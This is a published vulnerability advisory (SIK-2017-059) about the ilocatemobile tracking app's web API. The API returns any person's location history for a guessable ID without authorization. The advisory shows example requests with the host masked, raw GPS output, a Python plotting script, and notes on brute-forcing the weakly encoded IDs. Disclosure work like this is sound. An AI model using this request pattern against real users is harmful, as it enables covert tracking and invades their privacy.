SIK-2017-059

Title:

Location history of any user visible through simple http request in ilocatemobile App

Report ID:

SIK-2017-059

Summary:

Vendor: www.ilocatemobile.com (India)
Product: com.ilocatemobile.track
Affected Version: Current web API, any version
Severity: high
Short summary: Anyone can be tracked with their userid (only 7+ digits)

Details:

Example requests (personal data of us):

http://****.net/****.aspx?userid=999=9%3C%3E&childid=2125290&currentdate=07/12/2017

Output:

1*49.8715330929084*8.639047788304*12:01 AM to 07:47 PM*49.8715330929084,8.639047788304*free$0*49.8731935027927*8.63498598738923*07:52 PM*49.8731935027927,8.63498598738923*free$2*49.871533247265*8.63904788614738*07:53 PM to 08:18 PM*49.871533247265,8.63904788614738*free$3*49.8746898716628*8.63132643123319*08:23 PM to 09:43 PM*49.8746898716628,8.63132643123319*free$0*49.869405647943*8.62696200749833*09:48 PM*49.869405647943,8.62696200749833*free$0*49.8666552314999*8.61016720534173*09:51 PM*49.8666552314999,8.61016720534173*free$0*49.8654873239886*8.59767123148795*09:55 PM*49.8654873239886,8.59767123148795*free$4*49.8641625311038*8.58813668917857*09:57 PM to 10:01 PM*49.8641625311038,8.58813668917857*free$5*49.8658166328809*8.60092130078582*10:06 PM to 10:08 PM*49.8658166328809,8.60092130078582*free$6*49.8680391649373*8.62167639644787*10:13 PM to 11:59 PM*49.8680391649373,8.62167639644787*free

http://****.net/****.aspx?userid=999=9%3C%3E&childid=2125290&currentdate=07/13/2017

Output:


1*49.8713574818857*8.63875187154788*12:01 AM to 03:32 PM*49.8713574818857,8.63875187154788*free$2*49.8599651360695*8.6492436015952*03:37 PM to 04:20 PM*49.8599651360695,8.6492436015952*free$3*49.8659017082034*8.64005715469628*04:25 PM to 04:42 PM*49.8659017082034,8.64005715469628*free$4*49.8607193174197*8.64766700537198*04:47 PM to 04:55 PM*49.8607193174197,8.64766700537198*free$5*49.8660906810819*8.63996964056536*05:00 PM to 05:29 PM*49.8660906810819,8.63996964056536*free$0*49.8621368320675*8.64791435318605*05:34 PM*49.8621368320675,8.64791435318605*free$0*49.8657520135618*8.63545893595093*05:34 PM*49.8657520135618,8.63545893595093*free$0*49.8730387486151*8.63354724178888*05:35 PM*49.8730387486151,8.63354724178888*free$0*49.8694975879708*8.64390203882139*05:35 PM*49.8694975879708,8.64390203882139*free$0*49.8628475343781*8.64071739596497*05:36 PM*49.8628475343781,8.64071739596497*free$0*49.8689428418663*8.64375591155705*05:36 PM*49.8689428418663,8.64375591155705*free$6*49.8677465395485*8.63267482540419*05:37 PM to 11:59 PM*49.8677465395485,8.63267482540419*free

Data visualization:

import re
import gmplot

regex = re.compile("\d+\.\d+,\d+\.\d+")
for p in regex.findall( INPUT_DATA ):
    lats.append(float(p.split(",")[0])) 
    lons.append(float(p.split(",")[1]))

gmap = gmplot.GoogleMapPlotter(49.8,8.6,8)
gmap.scatter(lats,lons,"red")
gmap.draw("map.html")

userid could be anything, results will always be returned (this means anyone could track anyone else) . Childid is the id of the person to track. userid is ‚encrypted‘ by caesar cipher + 7. currentdate is the day requested.

User ids could be easily brute forced. Also, the requests are only http, so traffic could be easily sniffed for aquiring user ids.

Workaround

–

Suggested Mitigation

Use HTTPS, only allow authorized users to access other peoples data, real encryption.

Timeline

2017-08-31: Vulnerability discovered
2017-09-01: First contact email sent to developer
2018-08-11: Published